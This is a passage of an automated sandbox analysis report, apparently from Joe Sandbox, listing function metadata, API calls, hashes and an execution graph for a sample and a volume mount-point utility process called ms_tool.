                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 78beab65a65cc2877c0e82c042758ba84fda8fb02f857b7c0e002fda3f0cafa0
                                                      • Instruction ID: 57f3f3557f1fe6a0d340943ed8ba2696e5a0cb4cf8611c376f245f7ede8d48bd
                                                      • Opcode Fuzzy Hash: 78beab65a65cc2877c0e82c042758ba84fda8fb02f857b7c0e002fda3f0cafa0
                                                      • Instruction Fuzzy Hash: 3A416872900209AFCF1ACF98CD85AEEBBB5BF48311F184099FE1466211D335DA54EB50
                                                      Function 00F58342 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 00F583CA
                                                      • RaiseException.KERNEL32(?,?,?,?,?,00000000), ref: 00F583EF
                                                        • Part of subcall function 00F5C0D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F5BE3B,?,?,?,?,00F5BE3B,0000000C,00F88448,0000000C), ref: 00F5C131
                                                        • Part of subcall function 00F5F7B3: IsProcessorFeaturePresent.KERNEL32(00000017,00F5FC1C,?,00F5FA8F,00000001,00000016,00F61DB1,?,?,?,?,?,00000000), ref: 00F5F7CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                      • String ID: csm
                                                      • API String ID: 1924019822-1018135373
                                                      • Opcode ID: cea541d99ad7c0c2e657c417c9ffad24e1a69cc8051a095e160bfd82b4b23feb
                                                      • Instruction ID: 40b031bfdc854d37d5f5cd7cd51f8894018be1af2c6763aeab54609691a1ec54
                                                      • Opcode Fuzzy Hash: cea541d99ad7c0c2e657c417c9ffad24e1a69cc8051a095e160bfd82b4b23feb
                                                      • Instruction Fuzzy Hash: 2421A131D00218DBCF24DF95D985AAEB7B5EF04762F140009EE06BB151DB34AD4AEBC1
                                                      Function 00F51B00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F51B05
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F51B4A
                                                        • Part of subcall function 00F58F8E: _Yarn.LIBCPMT ref: 00F58FAD
                                                        • Part of subcall function 00F58F8E: _Yarn.LIBCPMT ref: 00F58FD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                      • String ID: bad locale name
                                                      • API String ID: 1908188788-1405518554
                                                      • Opcode ID: f61e93aeb2e222dd36bc563a17084de8656427c16616318297670a63c8ee868e
                                                      • Instruction ID: 8df799305671f045faddc3c0ccd9710e3d543aa27754554e4791ebf14aa10cc8
                                                      • Opcode Fuzzy Hash: f61e93aeb2e222dd36bc563a17084de8656427c16616318297670a63c8ee868e
                                                      • Instruction Fuzzy Hash: AFF09070511B808ED330DF358804743BEE0AF28314F044E1DD9CAC7A42E778E108CBA6

                                                      Execution Graph

                                                      Execution Coverage:32.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:8.8%
                                                      Total number of Nodes:182
                                                      Total number of Limit Nodes:5
                                                      execution_graph 388 7ff68c5e1754 CreateFileW 389 7ff68c5e17d0 DeviceIoControl 388->389 390 7ff68c5e180d 388->390 389->390 391 7ff68c5e182a FindCloseChangeNotification 390->391 392 7ff68c5e1839 390->392 391->392 393 7ff68c5e1855 FindFirstVolumeW 392->393 394 7ff68c5e183d GetLastError 392->394 393->394 405 7ff68c5e1874 393->405 454 7ff68c5e12d4 FormatMessageW 394->454 396 7ff68c5e1850 459 7ff68c5e28c0 396->459 399 7ff68c5e18a2 GetLastError 400 7ff68c5e18cd LocalAlloc 399->400 402 7ff68c5e18b5 GetLastError 399->402 404 7ff68c5e18ef GetVolumePathNamesForVolumeNameW 400->404 400->405 402->405 406 7ff68c5e190f LocalFree 404->406 409 7ff68c5e1920 404->409 407 7ff68c5e12d4 13 API calls 405->407 411 7ff68c5e198b FindNextVolumeW 405->411 427 7ff68c5e1238 405->427 406->402 407->405 410 7ff68c5e1238 13 API calls 409->410 412 7ff68c5e1238 13 API calls 409->412 419 7ff68c5e1972 LocalFree 409->419 434 7ff68c5e13b4 409->434 410->409 411->405 413 7ff68c5e19ad GetLastError 411->413 414 7ff68c5e193f LocalFree 412->414 415 7ff68c5e19e2 FindVolumeClose 413->415 416 7ff68c5e19be GetLastError 413->416 414->411 417 7ff68c5e19ff 415->417 418 7ff68c5e19f6 415->418 420 7ff68c5e12d4 13 API calls 416->420 439 7ff68c5e1348 NtQuerySystemInformation 417->439 422 7ff68c5e1238 13 API calls 418->422 424 7ff68c5e1238 13 API calls 419->424 421 7ff68c5e19d1 FindVolumeClose 420->421 421->396 422->417 424->411 467 7ff68c5e2f90 427->467 432 7ff68c5e28c0 7 API calls 433 7ff68c5e12c5 GetVolumePathNamesForVolumeNameW 432->433 433->399 433->400 435 7ff68c5e13cf 434->435 435->435 436 7ff68c5e1476 435->436 437 7ff68c5e13f3 CreateFileW 435->437 436->409 437->436 438 7ff68c5e142f DeviceIoControl CloseHandle 437->438 438->436 440 7ff68c5e138b 439->440 441 7ff68c5e28c0 7 API calls 440->441 442 7ff68c5e13a5 441->442 442->396 443 7ff68c5e1660 442->443 444 7ff68c5e168e 443->444 477 7ff68c5e1494 LocalAlloc 444->477 446 7ff68c5e28c0 7 API calls 448 7ff68c5e1735 446->448 447 7ff68c5e16ad QueryDosDeviceW 449 7ff68c5e16d9 lstrcmpW 447->449 450 7ff68c5e169a 447->450 448->396 449->450 452 7ff68c5e1701 449->452 450->447 451 7ff68c5e170e 450->451 451->446 452->451 453 7ff68c5e1238 13 API calls 452->453 453->451 455 7ff68c5e1130 5 API calls 454->455 456 7ff68c5e1328 455->456 457 7ff68c5e28c0 7 API calls 456->457 458 7ff68c5e1338 457->458 458->396 460 7ff68c5e28c9 459->460 461 7ff68c5e2920 RtlCaptureContext RtlLookupFunctionEntry 460->461 462 7ff68c5e1a1e 460->462 463 7ff68c5e2965 RtlVirtualUnwind 461->463 464 7ff68c5e29a7 461->464 463->464 484 7ff68c5e28e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 464->484 468 7ff68c5e1254 FormatMessageW 467->468 469 7ff68c5e1130 468->469 470 7ff68c5e114f 469->470 470->470 471 7ff68c5e1162 WriteConsoleW 470->471 472 7ff68c5e118a LocalAlloc 470->472 473 7ff68c5e121c 471->473 472->473 474 7ff68c5e11a8 WideCharToMultiByte 472->474 473->432 475 7ff68c5e11e1 474->475 475->475 476 7ff68c5e11ea WriteFile LocalFree 475->476 476->473 478 7ff68c5e14e9 477->478 479 7ff68c5e14c5 NtQuerySystemInformation 478->479 482 7ff68c5e14f0 LocalFree LocalAlloc 478->482 483 7ff68c5e1519 478->483 479->478 479->483 480 7ff68c5e1523 LocalFree 481 7ff68c5e1532 480->481 481->450 482->478 483->480 483->481 553 7ff68c5e1a44 554 7ff68c5e2f90 553->554 555 7ff68c5e1a6d CreateFileW 554->555 556 7ff68c5e1ac4 DeviceIoControl CloseHandle 555->556 557 7ff68c5e1cde 555->557 556->557 558 7ff68c5e1b13 FindFirstVolumeW 556->558 560 7ff68c5e28c0 7 API calls 557->560 558->557 559 7ff68c5e1b35 558->559 562 7ff68c5e1b5f FindFirstVolumeMountPointW 559->562 564 7ff68c5e1c79 FindVolumeMountPointClose 559->564 566 7ff68c5e1baf memcpy 559->566 561 7ff68c5e1cef 560->561 562->559 563 7ff68c5e1c88 FindNextVolumeW 562->563 563->559 565 7ff68c5e1cac FindVolumeClose 563->565 564->563 565->557 567 7ff68c5e1bd5 GetVolumeNameForVolumeMountPointW 566->567 568 7ff68c5e1d11 566->568 570 7ff68c5e1cc0 FindVolumeMountPointClose FindVolumeClose 567->570 571 7ff68c5e1c08 GetVolumeNameForVolumeMountPointW 567->571 569 7ff68c5e2a98 7 API calls 568->569 572 7ff68c5e1d16 569->572 570->557 573 7ff68c5e1c55 FindNextVolumeMountPointW 571->573 574 7ff68c5e1c29 GetLastError 571->574 573->559 573->564 574->570 575 7ff68c5e1c3e RemoveDirectoryW 574->575 575->570 575->573 485 7ff68c5e26c0 486 7ff68c5e26e4 485->486 487 7ff68c5e26f6 486->487 488 7ff68c5e26ff Sleep 486->488 489 7ff68c5e271b _amsg_exit 487->489 495 7ff68c5e2727 487->495 488->486 489->495 490 7ff68c5e2796 _initterm 493 7ff68c5e27b3 _IsNonwritableInCurrentImage 490->493 491 7ff68c5e277c 499 7ff68c5e1fdc SetThreadUILanguage SetErrorMode HeapSetInformation 493->499 494 7ff68c5e280d 496 7ff68c5e2824 494->496 497 7ff68c5e281c exit 494->497 495->490 495->491 495->493 496->491 498 7ff68c5e282d _cexit 496->498 497->496 498->491 500 7ff68c5e207a GetStdHandle GetConsoleMode 499->500 501 7ff68c5e205d GetLastError 499->501 505 7ff68c5e20f1 500->505 502 7ff68c5e12d4 13 API calls 501->502 503 7ff68c5e2070 502->503 504 7ff68c5e28c0 7 API calls 503->504 506 7ff68c5e219f 504->506 505->503 507 7ff68c5e2394 505->507 508 7ff68c5e22cc 505->508 506->494 511 7ff68c5e23d7 507->511 512 7ff68c5e2399 GetVolumeNameForVolumeMountPointW 507->512 509 7ff68c5e2323 508->509 510 7ff68c5e22d1 GetVolumeNameForVolumeMountPointW 508->510 515 7ff68c5e2331 DeleteVolumeMountPointW 509->515 516 7ff68c5e2498 509->516 514 7ff68c5e2300 510->514 513 7ff68c5e23df 511->513 526 7ff68c5e24e9 511->526 512->501 517 7ff68c5e23c1 512->517 518 7ff68c5e1348 8 API calls 513->518 514->509 515->503 519 7ff68c5e234a GetLastError 515->519 545 7ff68c5e2a98 RtlCaptureContext RtlLookupFunctionEntry 516->545 520 7ff68c5e1238 13 API calls 517->520 533 7ff68c5e23e4 518->533 519->501 521 7ff68c5e235f 519->521 522 7ff68c5e23d2 520->522 521->516 527 7ff68c5e2372 DefineDosDeviceW 521->527 522->516 523 7ff68c5e24df 523->494 525 7ff68c5e2563 SetVolumeMountPointW 525->516 526->525 528 7ff68c5e2527 QueryDosDeviceW 526->528 527->516 531 7ff68c5e254f 528->531 531->525 533->523 536 7ff68c5e2442 QueryDosDeviceW 533->536 536->531 537 7ff68c5e2472 536->537 540 7ff68c5e1660 20 API calls 537->540 541 7ff68c5e2481 540->541 541->523 542 7ff68c5e1494 5 API calls 541->542 543 7ff68c5e2494 542->543 543->516 544 7ff68c5e24af DefineDosDeviceW 543->544 544->516 546 7ff68c5e2ad5 RtlVirtualUnwind 545->546 547 7ff68c5e2b17 545->547 546->547 552 7ff68c5e28e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 547->552 576 7ff68c5e2be0 SetUnhandledExceptionFilter 577 7ff68c5e2ba0 578 7ff68c5e2bd2 577->578 579 7ff68c5e2baf 577->579 579->578 580 7ff68c5e2bcb ?terminate@ 579->580 580->578 581 7ff68c5e2670 __getmainargs 582 7ff68c5e2890 585 7ff68c5e2db4 582->585 586 7ff68c5e2de0 6 API calls 585->586 587 7ff68c5e2899 585->587 586->587 588 7ff68c5e283b 589 7ff68c5e2853 588->589 590 7ff68c5e284a _exit 588->590 591 7ff68c5e285c _cexit 589->591 592 7ff68c5e2868 589->592 590->589 591->592 593 7ff68c5e159c CreateFileW 594 7ff68c5e1632 593->594 595 7ff68c5e15f0 DeviceIoControl 593->595 596 7ff68c5e1647 594->596 597 7ff68c5e1638 CloseHandle 594->597 595->594 597->596 598 7ff68c5e10ac 599 7ff68c5e10db _vsnwprintf 598->599 600 7ff68c5e10fc 598->600 599->600

                                                      Callgraph

                                                      Executed Functions

                                                      Function 00007FF68C5E1754 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 181filememoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff68c5e1754-7ff68c5e17ce CreateFileW 1 7ff68c5e17d0-7ff68c5e180b DeviceIoControl 0->1 2 7ff68c5e180d-7ff68c5e180f 0->2 1->2 3 7ff68c5e181f 2->3 4 7ff68c5e1811-7ff68c5e181d 2->4 5 7ff68c5e1824-7ff68c5e1828 3->5 4->5 6 7ff68c5e182a-7ff68c5e1834 FindCloseChangeNotification 5->6 7 7ff68c5e1839-7ff68c5e183b 5->7 6->7 8 7ff68c5e1855-7ff68c5e1872 FindFirstVolumeW 7->8 9 7ff68c5e183d-7ff68c5e1850 GetLastError call 7ff68c5e12d4 7->9 8->9 11 7ff68c5e1874-7ff68c5e18a0 call 7ff68c5e1238 GetVolumePathNamesForVolumeNameW 8->11 14 7ff68c5e1a0f-7ff68c5e1a3a call 7ff68c5e28c0 9->14 16 7ff68c5e18a2-7ff68c5e18b3 GetLastError 11->16 17 7ff68c5e18cd-7ff68c5e18e8 LocalAlloc 11->17 16->17 19 7ff68c5e18b5-7ff68c5e18c1 GetLastError 16->19 21 7ff68c5e18ef-7ff68c5e190d GetVolumePathNamesForVolumeNameW 17->21 22 7ff68c5e18ea-7ff68c5e18ed 17->22 23 7ff68c5e18c3-7ff68c5e18c8 call 7ff68c5e12d4 19->23 24 7ff68c5e190f-7ff68c5e191e LocalFree 21->24 25 7ff68c5e1920-7ff68c5e1924 21->25 22->23 34 7ff68c5e198b-7ff68c5e19a7 FindNextVolumeW 23->34 24->19 26 7ff68c5e1950 25->26 27 7ff68c5e1926-7ff68c5e193a call 7ff68c5e13b4 call 7ff68c5e1238 25->27 30 7ff68c5e1953-7ff68c5e195b call 7ff68c5e1238 26->30 38 7ff68c5e193f-7ff68c5e194e LocalFree 27->38 36 7ff68c5e1960-7ff68c5e196a 30->36 34->11 37 7ff68c5e19ad-7ff68c5e19bc GetLastError 34->37 36->36 39 7ff68c5e196c-7ff68c5e1970 36->39 40 7ff68c5e19e2-7ff68c5e19f4 FindVolumeClose 37->40 41 7ff68c5e19be-7ff68c5e19e0 GetLastError call 7ff68c5e12d4 FindVolumeClose 37->41 38->34 39->30 44 7ff68c5e1972-7ff68c5e1986 LocalFree call 7ff68c5e1238 39->44 42 7ff68c5e19ff-7ff68c5e1a06 call 7ff68c5e1348 40->42 43 7ff68c5e19f6-7ff68c5e19fa call 7ff68c5e1238 40->43 41->14 42->14 51 7ff68c5e1a08-7ff68c5e1a0a call 7ff68c5e1660 42->51 43->42 44->34 51->14
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: Volume$ErrorFindLast$Local$CloseFree$NameNamesPath$AllocChangeControlCreateDeviceFileFirstFormatMessageNextNotification
                                                      • String ID: \\.\MountPointManager
                                                      • API String ID: 1486330377-3276014075
                                                      • Opcode ID: 4f1b137e6b44270cdbe81a40865537fca5d555951e32f5bc0a902f18b8e4e355
                                                      • Instruction ID: e63a3ba6870a7e250ae514d4c648a79eed8437527160e88bf835da0727ab5421
                                                      • Opcode Fuzzy Hash: 4f1b137e6b44270cdbe81a40865537fca5d555951e32f5bc0a902f18b8e4e355
                                                      • Instruction Fuzzy Hash: DA818232A08642C6EF549B61E4041BEBBA1FF89B50F459239DA5E837D1DF3CD415C702
                                                      Function 00007FF68C5E1494 Relevance: 7.6, APIs: 5, Instructions: 70memorynativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: Local$AllocFree$InformationQuerySystem
                                                      • String ID:
                                                      • API String ID: 3980593839-0
                                                      • Opcode ID: 6ddf1129da945206f3b33d3ec7b31e3c748a7bcc96a7b0cb28222ac49aeed3a8
                                                      • Instruction ID: c07f750ce35152697e6b21f6c2d745203fc63bb68bc8005c49dfa3635e0b21d7
                                                      • Opcode Fuzzy Hash: 6ddf1129da945206f3b33d3ec7b31e3c748a7bcc96a7b0cb28222ac49aeed3a8
                                                      • Instruction Fuzzy Hash: 6C216B31B08B82C6EE948B55E54417ABAA1FF89B80F55903ADB4F87746DF3CD861CB01
                                                      Function 00007FF68C5E13B4 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 244 7ff68c5e13b4-7ff68c5e13cd 245 7ff68c5e13cf-7ff68c5e13d6 244->245 245->245 246 7ff68c5e13d8-7ff68c5e13db 245->246 247 7ff68c5e13e1-7ff68c5e13ed 246->247 248 7ff68c5e1476 246->248 247->248 249 7ff68c5e13f3-7ff68c5e142d CreateFileW 247->249 250 7ff68c5e1478-7ff68c5e148a 248->250 249->248 251 7ff68c5e142f-7ff68c5e1474 DeviceIoControl CloseHandle 249->251 251->250
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: ee6c0a8678e403f1ed9499553ee9dcd739a3b3037c75b270b4454832f7db71cd
                                                      • Instruction ID: 39ffd844a19a15848588f5307ef9bdbfbf2a242e0d8b268a9f321ad50e1f988e
                                                      • Opcode Fuzzy Hash: ee6c0a8678e403f1ed9499553ee9dcd739a3b3037c75b270b4454832f7db71cd
                                                      • Instruction Fuzzy Hash: 03219572608B41C6EB604F15F44055ABAA0FB857B4F149328DEBA43BF4DF38C066CB01
                                                      Function 00007FF68C5E1348 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: InformationQuerySystem
                                                      • String ID:
                                                      • API String ID: 3562636166-0
                                                      • Opcode ID: b489f29188039f25b10ca4aa454a7b4c9ee8bc4f3949ed7625baf762e72cb729
                                                      • Instruction ID: 10161c591be6f473f04b784ce896e7f3cde51592cc1722979c46268f3b034f5c
                                                      • Opcode Fuzzy Hash: b489f29188039f25b10ca4aa454a7b4c9ee8bc4f3949ed7625baf762e72cb729
                                                      • Instruction Fuzzy Hash: 70F03672A28685C7EB50CF20E49156AB371FB9D748B919239EA8D86504EF38E194CB00
                                                      Function 00007FF68C5E1A44 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 170fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: Volume$Find$MountPoint$Close$FirstNameNext$ControlCreateDeviceDirectoryErrorFileHandleLastRemovememcpy
                                                      • String ID: %hs$\\.\MountPointManager
                                                      • API String ID: 1698496843-722914749
                                                      • Opcode ID: 29a9cc707cee59c8517bfaf76483b7fe94fdb033e3cae43ba1fd485cd4e056f7
                                                      • Instruction ID: 78c83c2a3130211dba6406f5afaeb4a8fe19c78b520d2771f2004bc5e2e37bc2
                                                      • Opcode Fuzzy Hash: 29a9cc707cee59c8517bfaf76483b7fe94fdb033e3cae43ba1fd485cd4e056f7
                                                      • Instruction Fuzzy Hash: CF71A032A08A82C6EF608F20E8442FA7BA4FF49B94F859139CA4E83754DF3CD559C701
                                                      Function 00007FF68C5E1FDC Relevance: 25.8, APIs: 17, Instructions: 294memorythreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 84 7ff68c5e1fdc-7ff68c5e205b SetThreadUILanguage SetErrorMode HeapSetInformation 85 7ff68c5e207a-7ff68c5e20b3 GetStdHandle GetConsoleMode 84->85 86 7ff68c5e205d-7ff68c5e2075 GetLastError call 7ff68c5e12d4 84->86 88 7ff68c5e20f1-7ff68c5e213c 85->88 91 7ff68c5e2190-7ff68c5e21bf call 7ff68c5e28c0 86->91 92 7ff68c5e218e 88->92 93 7ff68c5e220a-7ff68c5e22c6 88->93 92->91 99 7ff68c5e2394-7ff68c5e2397 93->99 100 7ff68c5e22cc-7ff68c5e22cf 93->100 103 7ff68c5e23d7-7ff68c5e23d9 99->103 104 7ff68c5e2399-7ff68c5e23bb GetVolumeNameForVolumeMountPointW 99->104 101 7ff68c5e2323-7ff68c5e232b 100->101 102 7ff68c5e22d1-7ff68c5e230c GetVolumeNameForVolumeMountPointW call 7ff68c5e1d20 100->102 108 7ff68c5e2331-7ff68c5e2344 DeleteVolumeMountPointW 101->108 109 7ff68c5e257d 101->109 102->101 105 7ff68c5e23df-7ff68c5e23e6 call 7ff68c5e1348 103->105 106 7ff68c5e24e9 103->106 104->86 110 7ff68c5e23c1-7ff68c5e23d2 call 7ff68c5e1238 104->110 121 7ff68c5e24df-7ff68c5e24e4 105->121 122 7ff68c5e23ec-7ff68c5e23f1 105->122 113 7ff68c5e24ee-7ff68c5e24f6 106->113 108->92 114 7ff68c5e234a-7ff68c5e2359 GetLastError 108->114 117 7ff68c5e2584-7ff68c5e25a0 call 7ff68c5e2a98 109->117 110->109 113->113 118 7ff68c5e24f8-7ff68c5e24fc 113->118 114->86 119 7ff68c5e235f-7ff68c5e236c 114->119 132 7ff68c5e25a2-7ff68c5e25a4 117->132 133 7ff68c5e25a6-7ff68c5e25bd 117->133 124 7ff68c5e2563-7ff68c5e2576 SetVolumeMountPointW 118->124 125 7ff68c5e24fe-7ff68c5e2506 118->125 119->117 126 7ff68c5e2372-7ff68c5e238f DefineDosDeviceW 119->126 128 7ff68c5e23f4-7ff68c5e23fc 122->128 127 7ff68c5e257b 124->127 125->124 130 7ff68c5e2508-7ff68c5e250d 125->130 126->127 127->109 128->128 131 7ff68c5e23fe-7ff68c5e2402 128->131 130->124 134 7ff68c5e250f-7ff68c5e251b 130->134 131->121 135 7ff68c5e2408-7ff68c5e2412 131->135 136 7ff68c5e25f9-7ff68c5e264d call 7ff68c5e2c68 __set_app_type call 7ff68c5e2cc0 132->136 133->132 137 7ff68c5e25bf-7ff68c5e25c8 133->137 138 7ff68c5e251d-7ff68c5e2525 134->138 139 7ff68c5e2527-7ff68c5e254d QueryDosDeviceW 134->139 135->121 141 7ff68c5e2418-7ff68c5e2420 135->141 157 7ff68c5e264f-7ff68c5e2656 __setusermatherr 136->157 158 7ff68c5e265c-7ff68c5e2662 136->158 142 7ff68c5e25ca-7ff68c5e25d3 137->142 143 7ff68c5e25e8-7ff68c5e25ee 137->143 138->124 138->139 144 7ff68c5e254f 139->144 145 7ff68c5e2559-7ff68c5e255e 139->145 141->121 147 7ff68c5e2426-7ff68c5e2432 141->147 142->132 148 7ff68c5e25d5-7ff68c5e25de 142->148 143->136 149 7ff68c5e25f0 143->149 144->145 145->124 152 7ff68c5e2442-7ff68c5e246c QueryDosDeviceW 147->152 153 7ff68c5e2434-7ff68c5e243c 147->153 148->136 154 7ff68c5e25e0-7ff68c5e25e6 148->154 150 7ff68c5e25f6 149->150 150->136 152->144 156 7ff68c5e2472-7ff68c5e2486 call 7ff68c5e1660 152->156 153->121 153->152 154->150 156->121 161 7ff68c5e2488-7ff68c5e2496 call 7ff68c5e1494 156->161 157->158 164 7ff68c5e24a0 161->164 165 7ff68c5e2498-7ff68c5e249b 161->165 166 7ff68c5e24a5-7ff68c5e24ad 164->166 165->109 166->166 167 7ff68c5e24af-7ff68c5e24da DefineDosDeviceW 166->167 167->109
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ConsoleFormatHandleHeapInformationLanguageLastMessageThread
                                                      • String ID:
                                                      • API String ID: 2611510217-0
